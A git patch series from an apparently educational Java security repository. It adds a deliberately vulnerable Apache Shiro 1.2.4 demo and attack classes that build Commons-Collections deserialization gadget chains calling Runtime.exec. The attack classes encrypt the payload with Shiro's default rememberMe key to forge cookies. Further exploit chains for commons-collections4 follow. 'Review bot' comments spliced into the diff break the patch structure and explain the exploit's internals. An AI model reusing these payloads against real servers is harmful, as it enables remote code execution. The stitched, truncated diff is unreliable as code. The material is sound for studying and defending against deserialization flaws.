shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java delete mode 100644 shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java delete mode 100644 shiro/src/main/java/org/vulhub/shirodemo/UserController.java delete mode 100644 shiro/src/main/resources/application.properties delete mode 100644 shiro/src/main/resources/templates/error.html create mode 100644 shiroattack/pom.xml create mode 100644 shiroattack/shiroattack.iml rename {shiro/src/main/java/org/vulhub => shiroattack/src/main/java/com/govuln}/shiroattack/Client.java (85%) create mode 100644 shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java rename {shiro/src/main/java/org/vulhub => 
shiroattack/src/main/java/com/govuln}/shiroattack/CommonsCollectionsShiro.java (94%) rename {shiro/src/main/java/org/vulhub => shiroattack/src/main/java/com/govuln}/shiroattack/Evil.java (95%) create mode 100644 shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java create mode 100644 shirodemo/pom.xml create mode 100644 shirodemo/shirodemo.iml create mode 100644 shirodemo/src/main/webapp/WEB-INF/shiro.ini create mode 100644 shirodemo/src/main/webapp/WEB-INF/web.xml rename shiro/src/main/resources/templates/hello.html => shirodemo/src/main/webapp/index.jsp (73%) rename shiro/src/main/resources/templates/login.html => shirodemo/src/main/webapp/login.jsp (72%) diff --git a/shiro/.gitignore b/shiro/.gitignore deleted file mode 100644 index a2a3040..0000000 --- a/shiro/.gitignore +++ /dev/null @@ -1,31 +0,0 @@ -HELP.md -target/ -!.mvn/wrapper/maven-wrapper.jar -!**/src/main/** -!**/src/test/** - -### STS ### -.apt_generated -.classpath -.factorypath -.project -.settings -.springBeans -.sts4-cache - -### IntelliJ IDEA ### -.idea -*.iws -*.iml -*.ipr - -### NetBeans ### -/nbproject/private/ -/nbbuild/ -/dist/ -/nbdist/ -/.nb-gradle/ -build/ - -### VS Code ### -.vscode/ diff --git a/shiro/pom.xml b/shiro/pom.xml deleted file mode 100644 index 85dad86..0000000 --- a/shiro/pom.xml +++ /dev/null 
@@ -1,75 +0,0 @@ - - - 4.0.0 - - org.springframework.boot - spring-boot-starter-parent - 2.2.2.RELEASE - - - org.vulhub - shirodemo - 1.0-SNAPSHOT - shirodemo - Demo project for Spring Boot and Shiro - - - 1.8 - - - - - org.springframework.boot - spring-boot-starter-thymeleaf - 2.2.2.RELEASE - - - org.springframework.boot - spring-boot-starter-web - 2.2.2.RELEASE - - - - org.projectlombok - lombok - 1.18.10 - true - - - - org.apache.shiro - shiro-core - 1.2.4 - - - - org.apache.shiro - shiro-spring - 1.2.4 - - - - commons-collections - commons-collections - 3.2.1 - - - - org.javassist - javassist - 3.27.0-GA - - - - - - - - org.springframework.boot - spring-boot-maven-plugin - - - - - diff --git a/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java b/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java deleted file mode 100644 index 7e8b67e..0000000 --- a/shiro/src/main/java/org/vulhub/shirodemo/MainRealm.java +++ /dev/null @@ -1,25 +0,0 @@ -package org.vulhub.shirodemo; - -import org.apache.shiro.authc.*; -import org.apache.shiro.authz.AuthorizationInfo; -import org.apache.shiro.realm.AuthorizingRealm; -import org.apache.shiro.subject.PrincipalCollection; - -public class MainRealm extends AuthorizingRealm { - - @Override - protected AuthorizationInfo doGetAuthorizationInfo(PrincipalCollection principalCollection) { - return null; - } - - @Override - protected AuthenticationInfo doGetAuthenticationInfo(AuthenticationToken authenticationToken) throws AuthenticationException { - String username = (String) authenticationToken.getPrincipal(); - String password = new String((char [])authenticationToken.getCredentials()); - if (username.equals("admin") && password.equals("vulhub")) { - return new SimpleAuthenticationInfo(username, password, getName()); - } else { - throw new IncorrectCredentialsException("Username or password is incorrect."); - } - } -} 
diff --git a/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java b/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java
deleted file mode 100644
index 9dfdc1b..0000000
--- a/shiro/src/main/java/org/vulhub/shirodemo/ShiroConfig.java
+++ /dev/null
@@ -1,46 +0,0 @@
-package org.vulhub.shirodemo;
-
-import org.apache.shiro.mgt.RememberMeManager;
-import org.apache.shiro.mgt.SecurityManager;
-import org.apache.shiro.spring.web.ShiroFilterFactoryBean;
-import org.apache.shiro.web.mgt.CookieRememberMeManager;
-import org.apache.shiro.web.mgt.DefaultWebSecurityManager;
-import org.springframework.context.annotation.Bean;
-import org.springframework.context.annotation.Configuration;
-
-import java.util.LinkedHashMap;
-import java.util.Map;
-
-@Configuration
-public class ShiroConfig {
- @Bean
- MainRealm mainRealm() {
- return new MainRealm();
- }
-
- @Bean
- RememberMeManager cookieRememberMeManager() {
- return new CookieRememberMeManager();
- }
-
- @Bean
- SecurityManager securityManager(MainRealm mainRealm, RememberMeManager cookieRememberMeManager) {
- DefaultWebSecurityManager manager = new DefaultWebSecurityManager();
- manager.setRealm(mainRealm);
- manager.setRememberMeManager(cookieRememberMeManager);
- return manager;
- }
-
- @Bean(name="shiroFilter")
- ShiroFilterFactoryBean shiroFilterFactoryBean(SecurityManager securityManager) {
- ShiroFilterFactoryBean bean = new ShiroFilterFactoryBean();
- bean.setSecurityManager(securityManager);
- bean.setLoginUrl("/login");
- bean.setUnauthorizedUrl("/unauth");
- Map map = new LinkedHashMap<>();
- map.put("/doLogin", "anon");
- map.put("/**", "user");
- bean.setFilterChainDefinitionMap(map);
- return bean;
- }
-}
diff --git a/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java b/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java
deleted file mode 100644
index 46303d0..0000000
--- a/shiro/src/main/java/org/vulhub/shirodemo/ShirodemoApplication.java
+++ /dev/null
@@ -1,13 +0,0 @@
-package org.vulhub.shirodemo;
-
-import org.springframework.boot.SpringApplication;
-import org.springframework.boot.autoconfigure.SpringBootApplication;
-
-@SpringBootApplication
-public class ShirodemoApplication {
-
- public static void main(String[] args) {
- SpringApplication.run(ShirodemoApplication.class, args);
- }
-
-}
diff --git a/shiro/src/main/java/org/vulhub/shirodemo/UserController.java b/shiro/src/main/java/org/vulhub/shirodemo/UserController.java
deleted file mode 100644
index 4317c69..0000000
--- a/shiro/src/main/java/org/vulhub/shirodemo/UserController.java
+++ /dev/null
@@ -1,38 +0,0 @@
-package org.vulhub.shirodemo;
-
-import org.apache.shiro.SecurityUtils;
-import org.apache.shiro.authc.AuthenticationException;
-import org.apache.shiro.authc.UsernamePasswordToken;
-import org.apache.shiro.subject.Subject;
-import org.springframework.stereotype.Controller;
-import org.springframework.web.bind.annotation.*;
-
-@Controller
-public class UserController {
- @PostMapping("/doLogin")
- public String doLoginPage(@RequestParam("username") String username, @RequestParam("password") String password, @RequestParam(name="rememberme", defaultValue = "") String rememberMe) {
- Subject subject = SecurityUtils.getSubject();
- try {
- subject.login(new UsernamePasswordToken(username, password, rememberMe.equals("remember-me")));
- } catch (AuthenticationException e) {
- return "forward:/login";
- }
-
- return "forward:/";
- }
-
- @RequestMapping("/")
- public String helloPage() {
- return "hello";
- }
-
- @RequestMapping("/unauth")
- public String errorPage() {
- return "error";
- }
-
- @RequestMapping("/login")
- public String loginPage() {
- return "login";
- }
-}
diff --git a/shiro/src/main/resources/application.properties b/shiro/src/main/resources/application.properties
deleted file mode 100644
index 8b13789..0000000
--- a/shiro/src/main/resources/application.properties
+++ /dev/null
@@ -1 +0,0 @@
-
diff --git a/shiro/src/main/resources/templates/error.html b/shiro/src/main/resources/templates/error.html deleted file mode 100644 index 2e5f137..0000000 --- a/shiro/src/main/resources/templates/error.html +++ /dev/null @@ -1,12 +0,0 @@ - - - - - Error - - - -

login error

- - - \ No newline at end of file diff --git a/shiroattack/pom.xml b/shiroattack/pom.xml new file mode 100644 index 0000000..cbf7952 --- /dev/null +++ b/shiroattack/pom.xml @@ -0,0 +1,96 @@ + + + + 4.0.0 + + com.govuln + shiroattack + 1.0-SNAPSHOT + + shiroattack + + http://www.example.com + + + UTF-8 + 1.8 + 1.8 + + + + + org.apache.shiro + shiro-core + 1.2.4 + + + + org.javassist + javassist + 3.27.0-GA + + + + commons-collections + commons-collections + 3.2.1 + + + + + + + + + maven-clean-plugin + 3.1.0 + + + + maven-resources-plugin + 3.0.2 + + + maven-compiler-plugin + 3.8.0 + + + maven-surefire-plugin + 2.22.1 + + + maven-jar-plugin + 3.0.2 + + + maven-install-plugin + 2.5.2 + + + maven-deploy-plugin + 2.8.2 + + + + maven-site-plugin + 3.7.1 + + + maven-project-info-reports-plugin + 3.0.0 + + + + + + org.apache.maven.plugins + maven-compiler-plugin + + 8 + 8 + + + + + diff --git a/shiroattack/shiroattack.iml b/shiroattack/shiroattack.iml new file mode 100644 index 0000000..78b2cc5 --- /dev/null +++ b/shiroattack/shiroattack.iml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/shiro/src/main/java/org/vulhub/shiroattack/Client.java b/shiroattack/src/main/java/com/govuln/shiroattack/Client.java similarity index 85% rename from shiro/src/main/java/org/vulhub/shiroattack/Client.java rename to shiroattack/src/main/java/com/govuln/shiroattack/Client.java index 3b7abd2..12d86a5 100644 --- a/shiro/src/main/java/org/vulhub/shiroattack/Client.java +++ b/shiroattack/src/main/java/com/govuln/shiroattack/Client.java @@ -1,4 +1,4 @@ -package org.vulhub.shiroattack; +package com.govuln.shiroattack; import javassist.ClassPool; import javassist.CtClass; 
@@ -8,7 +8,7 @@
 public class Client {
 public static void main(String []args) throws Exception {
 ClassPool pool = ClassPool.getDefault();
- CtClass clazz = pool.get(Evil.class.getName());
+ CtClass clazz = pool.get(com.govuln.shiroattack.Evil.class.getName());
 byte[] payloads = new CommonsCollectionsShiro().getPayload(clazz.toBytecode());
 
 AesCipherService aes = new AesCipherService();
diff --git a/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java
new file mode 100644
index 0000000..7bb2cc9
--- /dev/null
+++ b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java
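Review bot: `pool.get(com.govuln.shiroattack.Evil.class.getName())` spells out the package of a class that lives in the same package as Client (the `package com.govuln.shiroattack;` line of this file), so the qualification adds nothing and reads as if a different `Evil` were meant; `CtClass clazz = pool.get(Evil.class.getName());` is clearer. main's body continues outside the hunk.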
@@ -0,0 +1,55 @@
+package com.govuln.shiroattack;
+
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.Field;
+import java.util.HashMap;
+import java.util.Map;
+
+
+public class CommonsCollections6 {
+ public byte[] getPayload(String command) throws Exception {
+ Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)};
+ Transformer[] transformers = new Transformer[] {
+ new ConstantTransformer(Runtime.class),
+ new InvokerTransformer("getMethod", new Class[] { String.class,
+ Class[].class }, new Object[] { "getRuntime",
+ new Class[0] }),
+ new InvokerTransformer("invoke", new Class[] { Object.class,
+ Object[].class }, new Object[] { null, new Object[0] }),
+ new InvokerTransformer("exec", new Class[] { String.class },
+ new String[] { command }),
+ new ConstantTransformer(1),
+ };
+ Transformer transformerChain = new ChainedTransformer(fakeTransformers);
+
+ // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap
+ Map innerMap = new HashMap();
+ Map outerMap = LazyMap.decorate(innerMap, transformerChain);
+
+ TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey");
+
+ Map expMap = new HashMap();
+ expMap.put(tme, "valuevalue");
+
+ outerMap.remove("keykey");
+
+ Field f = ChainedTransformer.class.getDeclaredField("iTransformers");
+ f.setAccessible(true);
+ f.set(transformerChain, transformers);
+
+ ByteArrayOutputStream barr = new ByteArrayOutputStream();
+ ObjectOutputStream oos = new ObjectOutputStream(barr);
+ oos.writeObject(expMap);
+ oos.close();
+
+ return barr.toByteArray();
+ }
+}
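Review bot: The swap from `fakeTransformers` to the real chain (`f.set(transformerChain, transformers)` at the end of getPayload) is the load-bearing trick of this file and has no comment explaining it. Presumably `expMap.put(tme, "valuevalue")` hashes the TiedMapEntry, which reads through the LazyMap and runs the chain once on the generating host, so the harmless ConstantTransformer(1) chain has to be the one installed at that moment, and `outerMap.remove("keykey")` then clears the key so LazyMap.get() runs the transformer again at readObject time on the target. I would add `// harmless chain is installed while the map is built: TiedMapEntry.hashCode() -> LazyMap.get() would otherwise run the command locally` above the put and `// drop the key put() inserted so LazyMap.get() transforms again on the target` above the remove. Also `oos` is only closed on the happy path; `try (ObjectOutputStream oos = new ObjectOutputStream(barr)) { oos.writeObject(expMap); }` closes it regardless.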
diff --git a/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java similarity index 94% rename from shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java rename to shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java index 2f69fef..cb0e46a 100644 --- a/shiro/src/main/java/org/vulhub/shiroattack/CommonsCollectionsShiro.java +++ b/shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java @@ -1,15 +1,14 @@ -package org.vulhub.shiroattack; +package com.govuln.shiroattack; import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import javassist.ClassPool; -import javassist.CtClass; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; -import java.io.*; +import java.io.ByteArrayOutputStream; +import java.io.ObjectOutputStream; import java.lang.reflect.Field; import java.util.HashMap; import java.util.Map; diff --git a/shiro/src/main/java/org/vulhub/shiroattack/Evil.java b/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java similarity index 95% rename from shiro/src/main/java/org/vulhub/shiroattack/Evil.java rename to shiroattack/src/main/java/com/govuln/shiroattack/Evil.java index ae12bba..0336572 100644 --- a/shiro/src/main/java/org/vulhub/shiroattack/Evil.java +++ b/shiroattack/src/main/java/com/govuln/shiroattack/Evil.java @@ -1,4 +1,4 @@ -package org.vulhub.shiroattack; +package com.govuln.shiroattack; import com.sun.org.apache.xalan.internal.xsltc.DOM; import com.sun.org.apache.xalan.internal.xsltc.TransletException; 
diff --git a/shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java b/shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java new file mode 100644 index 0000000..0e45f6e --- /dev/null +++ b/shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java @@ -0,0 +1,17 @@ +package com.govuln.shiroattack; + +import org.apache.shiro.crypto.AesCipherService; +import org.apache.shiro.util.ByteSource; + +public class Wrong { + public static void main(String []args) throws Exception { + + // byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("D:\\pro\\ysoserial\\poc.ser")); + byte[] payloads = new CommonsCollections6().getPayload("calc.exe"); + AesCipherService aes = new AesCipherService(); + byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); + + ByteSource ciphertext = aes.encrypt(payloads, key); + System.out.printf(ciphertext.toString()); + } +} diff --git a/shirodemo/pom.xml b/shirodemo/pom.xml new file mode 100644 index 0000000..f4e48d6 --- /dev/null +++ b/shirodemo/pom.xml @@ -0,0 +1,108 @@ + + + + 4.0.0 + + com.govuln + shirodemo + 1.0-SNAPSHOT + war + + shirodemo Maven Webapp + http://www.example.com + + + UTF-8 + 1.7 + 1.7 + + + + + org.apache.shiro + shiro-core + 1.2.4 + + + org.apache.shiro + shiro-web + 1.2.4 + + + + javax.servlet + javax.servlet-api + 3.1.0 + provided + + + + javax.servlet.jsp + jsp-api + 2.2 + provided + + + + + commons-collections + commons-collections + 3.2.1 + + + + commons-logging + commons-logging + 1.2 + + + org.slf4j + slf4j-api + 1.7.30 + + + org.slf4j + slf4j-simple + 1.7.30 + + + + + + shirodemo + + + + maven-clean-plugin + 3.1.0 + + + + maven-resources-plugin + 3.0.2 + + + maven-compiler-plugin + 3.8.0 + + + maven-surefire-plugin + 2.22.1 + + + maven-war-plugin + 3.2.2 + + + maven-install-plugin + 2.5.2 + + + maven-deploy-plugin + 2.8.2 + + + + + diff --git a/shirodemo/shirodemo.iml b/shirodemo/shirodemo.iml new file mode 100644 index 0000000..78b2cc5 --- /dev/null 
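Review bot: `System.out.printf(ciphertext.toString())` passes the encoded payload as the format string, so any `%` in it would be parsed as a format specifier; `System.out.println(ciphertext.toString())` is the intended call. If ByteSource.toString() is base64 here the alphabet contains no `%`, so this is latent today, but it is the wrong idiom for printing data. The hardcoded `kPH+bIxk5D2deZiIxcaaaA==` is presumably the default rememberMe cipher key shipped with the Shiro version this module pins (shiro-core 1.2.4 in the pom above); a one-line comment such as `// default rememberMe AES key built into Shiro <= 1.2.4` would tell readers why this key is expected to work against the demo.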
+++ b/shirodemo/shirodemo.iml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/shirodemo/src/main/webapp/WEB-INF/shiro.ini b/shirodemo/src/main/webapp/WEB-INF/shiro.ini new file mode 100644 index 0000000..d56f06c --- /dev/null +++ b/shirodemo/src/main/webapp/WEB-INF/shiro.ini @@ -0,0 +1,20 @@ +[main] +shiro.loginUrl = /login.jsp + +[users] +# format: username = password, role1, role2, ..., roleN +root = secret,admin +guest = guest,guest + +[roles] +# format: roleName = permission1, permission2, ..., permissionN +admin = * + +[urls] +# The /login.jsp is not restricted to authenticated users (otherwise no one could log in!), but +# the 'authc' filter must still be specified for it so it can process that url's +# login submissions. It is 'smart' enough to allow those requests through as specified by the +# shiro.loginUrl above. +/login.jsp = authc +/logout = logout +/** = user diff --git a/shirodemo/src/main/webapp/WEB-INF/web.xml b/shirodemo/src/main/webapp/WEB-INF/web.xml new file mode 100644 index 0000000..90d24e1 --- /dev/null +++ b/shirodemo/src/main/webapp/WEB-INF/web.xml @@ -0,0 +1,26 @@ + + + + + + org.apache.shiro.web.env.EnvironmentLoaderListener + + + + ShiroFilter + org.apache.shiro.web.servlet.ShiroFilter + + + + ShiroFilter + /* + + + + index.jsp + + diff --git a/shiro/src/main/resources/templates/hello.html b/shirodemo/src/main/webapp/index.jsp similarity index 73% rename from shiro/src/main/resources/templates/hello.html rename to shirodemo/src/main/webapp/index.jsp index 26d0701..156686b 100644 --- a/shiro/src/main/resources/templates/hello.html +++ b/shirodemo/src/main/webapp/index.jsp @@ -1,3 +1,4 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> diff --git a/shiro/src/main/resources/templates/login.html b/shirodemo/src/main/webapp/login.jsp similarity index 72% rename from shiro/src/main/resources/templates/login.html rename to shirodemo/src/main/webapp/login.jsp index b8e743b..c64d2e1 100644 
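Review bot: The new shiro.ini never configures `securityManager.rememberMeManager.cipherKey` in `[main]`, so with shiro-core 1.2.4 pinned in shirodemo/pom.xml the rememberMe cookie is encrypted under the library's built-in default key, which is exactly what Client0/Client in this patch target. That is presumably deliberate for a vulnerable demo, but the file should say so, e.g. `# NOTE: no cipherKey on purpose - rememberMe uses the hardcoded default key of Shiro 1.2.4 (CVE-2016-4437); never deploy this`. The `/** = user` rule matters for the same reason, since the `user` filter also admits remembered (not just authenticated) identities, so a forged rememberMe cookie is processed without any login; a short comment on that line would save the next reader a trip to the Shiro docs.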
--- a/shiro/src/main/resources/templates/login.html +++ b/shirodemo/src/main/webapp/login.jsp @@ -1,3 +1,4 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> @@ -67,18 +68,18 @@ - + - + \ No newline at end of file From 91f70b00fa3535a650c9a68e26250ea916c6526c Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 26 Mar 2021 04:16:16 +0800 Subject: [PATCH 14/35] rename --- .../java/com/govuln/shiroattack/{Wrong.java => Client0.java} | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) rename shiroattack/src/main/java/com/govuln/shiroattack/{Wrong.java => Client0.java} (79%) diff --git a/shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java b/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java similarity index 79% rename from shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java rename to shiroattack/src/main/java/com/govuln/shiroattack/Client0.java index 0e45f6e..177dec5 100644 --- a/shiroattack/src/main/java/com/govuln/shiroattack/Wrong.java +++ b/shiroattack/src/main/java/com/govuln/shiroattack/Client0.java @@ -3,10 +3,8 @@ import org.apache.shiro.crypto.AesCipherService; import org.apache.shiro.util.ByteSource; -public class Wrong { +public class Client0 { public static void main(String []args) throws Exception { - - // byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("D:\\pro\\ysoserial\\poc.ser")); byte[] payloads = new CommonsCollections6().getPayload("calc.exe"); AesCipherService aes = new AesCipherService(); byte[] key = java.util.Base64.getDecoder().decode("kPH+bIxk5D2deZiIxcaaaA=="); From 9af022168773f2c814951d50bdb3f56bff7ce2f4 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 26 Mar 2021 04:18:55 +0800 Subject: [PATCH 15/35] update manual --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index 96434cf..37c2709 100644 --- a/README.md +++ b/README.md 
@@ -37,3 +37,9 @@ - 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) + +Shiro反序列化: + +- 一个最简单的Shiro Web应用:[shirodemo](shirodemo/) +- 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java),在Tomcat中可能会无法成功反序列化 +- 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java),解决上述问题 From 8d35c574c35821376710ea5fed222f88298b7ba3 Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 26 Mar 2021 04:20:24 +0800 Subject: [PATCH 16/35] add gadget class --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 37c2709..a5d7778 100644 --- a/README.md +++ b/README.md @@ -41,5 +41,5 @@ Shiro反序列化: - 一个最简单的Shiro Web应用:[shirodemo](shirodemo/) -- 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java),在Tomcat中可能会无法成功反序列化 -- 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java),解决上述问题 +- 使用CommonsCollections6与Shiro默认Key构造Payload:[Client0.java](shiroattack/src/main/java/com/govuln/shiroattack/Client0.java)、[CommonsCollections6.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollections6.java),在Tomcat中可能会无法成功反序列化 +- 使用CommonsCollections、TemplatesImpl与Shiro默认Key构造Payload:[Client.java](shiroattack/src/main/java/com/govuln/shiroattack/Client.java)、[CommonsCollectionsShiro.java](shiroattack/src/main/java/com/govuln/shiroattack/CommonsCollectionsShiro.java),解决上述问题 
From 44ea166eba3d4530cc29eae1b98332fe2bd2947a Mon Sep 17 00:00:00 2001 From: phith0n Date: Fri, 26 Mar 2021 20:16:35 +0800 Subject: [PATCH 17/35] =?UTF-8?q?add=20=20Java=E5=AE=89=E5=85=A8=E6=BC=AB?= =?UTF-8?q?=E8=B0=88=20-=2015.TemplatesImpl=E5=9C=A8Shiro=E4=B8=AD?= =?UTF-8?q?=E7=9A=84=E5=88=A9=E7=94=A8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index a5d7778..d94f0d2 100644 --- a/README.md +++ b/README.md @@ -19,6 +19,7 @@ - [Java安全漫谈 - 番外篇1. BCEL ClassLoader去哪了?](https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html) - [Java安全漫谈 - 13.Java中动态加载字节码的那些方法](https://t.zsxq.com/E2VfUVB) - [Java安全漫谈 - 14.为什么需要CommonsCollections3](https://t.zsxq.com/i6Y7QN7) +- [ Java安全漫谈 - 15.TemplatesImpl在Shiro中的利用](https://t.zsxq.com/JAUBmMz) ## Demo代码 From 2e01c4054a17ca143b49ac3ecbb2bd853bf49f7c Mon Sep 17 00:00:00 2001 From: phith0n Date: Sat, 27 Mar 2021 21:02:01 +0800 Subject: [PATCH 18/35] add CommonsCollections6For4 --- README.md | 1 + general/pom.xml | 6 ++ .../CommonsCollections6For4.java | 61 +++++++++++++++++++ 3 files changed, 68 insertions(+) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java diff --git a/README.md b/README.md index d94f0d2..68b7e40 100644 --- a/README.md +++ b/README.md @@ -38,6 +38,7 @@ - 无InvokerTransformer的Transformer Demo:[CommonsCollectionsIntro3.java](general/src/main/java/com/govuln/deserialization/CommonsCollectionsIntro3.java) - 我简化的[CommonsCollections3](general/src/main/java/com/govuln/deserialization/CommonsCollections3.java) - CommonsCollections6一次执行多个命令:[CommonsCollections6Multiple](general/src/main/java/com/govuln/deserialization/CommonsCollections6Multiple.java) +- 支持commons-collections4.0版本的CommonsCollections6利用链:[CommonsCollections6For4](general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java) Shiro反序列化: 
diff --git a/general/pom.xml b/general/pom.xml index 8c46c88..7b278cd 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -25,6 +25,12 @@ commons-collections 3.2.1 + + + org.apache.commons + commons-collections4 + 4.0 + diff --git a/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java b/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java new file mode 100644 index 0000000..3511541 --- /dev/null +++ b/general/src/main/java/com/govuln/deserialization/CommonsCollections6For4.java 
@@ -0,0 +1,61 @@ +package com.govuln.deserialization; + +import org.apache.commons.collections4.Transformer; +import org.apache.commons.collections4.functors.ChainedTransformer; +import org.apache.commons.collections4.functors.ConstantTransformer; +import org.apache.commons.collections4.functors.InvokerTransformer; +import org.apache.commons.collections4.keyvalue.TiedMapEntry; +import org.apache.commons.collections4.map.LazyMap; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import java.lang.reflect.Field; +import java.util.HashMap; +import java.util.Map; + +public class CommonsCollections6For4 { + public static void main(String[] args) throws Exception { + Transformer[] fakeTransformers = new Transformer[] {new ConstantTransformer(1)}; + Transformer[] transformers = new Transformer[] { + new ConstantTransformer(Runtime.class), + new InvokerTransformer("getMethod", new Class[] { String.class, + Class[].class }, new Object[] { "getRuntime", + new Class[0] }), + new InvokerTransformer("invoke", new Class[] { Object.class, + Object[].class }, new Object[] { null, new Object[0] }), + new InvokerTransformer("exec", new Class[] { String.class }, + new String[] { "calc.exe" }), + new ConstantTransformer(1), + }; + Transformer transformerChain = new ChainedTransformer(fakeTransformers); + + // 不再使用原CommonsCollections6中的HashSet,直接使用HashMap + Map innerMap = new HashMap(); + Map outerMap = LazyMap.lazyMap(innerMap, transformerChain); + + TiedMapEntry tme = new TiedMapEntry(outerMap, "keykey"); + + Map expMap = new HashMap(); + expMap.put(tme, "valuevalue"); + + outerMap.remove("keykey"); + + Field f = ChainedTransformer.class.getDeclaredField("iTransformers"); + f.setAccessible(true); + f.set(transformerChain, transformers); + + // ================== + // 生成序列化字符串 + ByteArrayOutputStream barr = new ByteArrayOutputStream(); + ObjectOutputStream oos = new 
ObjectOutputStream(barr); + oos.writeObject(expMap); + oos.close(); + + // 本地测试触发 + System.out.println(barr); + ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(barr.toByteArray())); + Object o = (Object)ois.readObject(); + } +} From c33968c6c256fbcbb1471831a7ce1b5bc2f275f3 Mon Sep 17 00:00:00 2001 From: phith0n Date: Sun, 28 Mar 2021 03:22:14 +0800 Subject: [PATCH 19/35] for commons-collections4 --- general/pom.xml | 7 ++ .../main/java/com/govuln/bytes/HelloBCEL.java | 4 +- .../deserialization/CommonsCollections1.java | 51 +++++++++++++ .../CommonsCollections1For4.java | 51 +++++++++++++ .../deserialization/CommonsCollections2.java | 55 ++++++++++++++ .../CommonsCollections3For4.java | 72 +++++++++++++++++++ 6 files changed, 238 insertions(+), 2 deletions(-) create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections1.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections1For4.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections2.java create mode 100644 general/src/main/java/com/govuln/deserialization/CommonsCollections3For4.java diff --git a/general/pom.xml b/general/pom.xml index 7b278cd..afac8b0 100644 --- a/general/pom.xml +++ b/general/pom.xml @@ -31,6 +31,12 @@ commons-collections4 4.0 + + + javassist + javassist + 3.12.1.GA + @@ -49,6 +55,7 @@ maven-compiler-plugin 3.8.0 + maven-surefire-plugin diff --git a/general/src/main/java/com/govuln/bytes/HelloBCEL.java b/general/src/main/java/com/govuln/bytes/HelloBCEL.java index f0e92af..f341b61 100644 --- a/general/src/main/java/com/govuln/bytes/HelloBCEL.java +++ 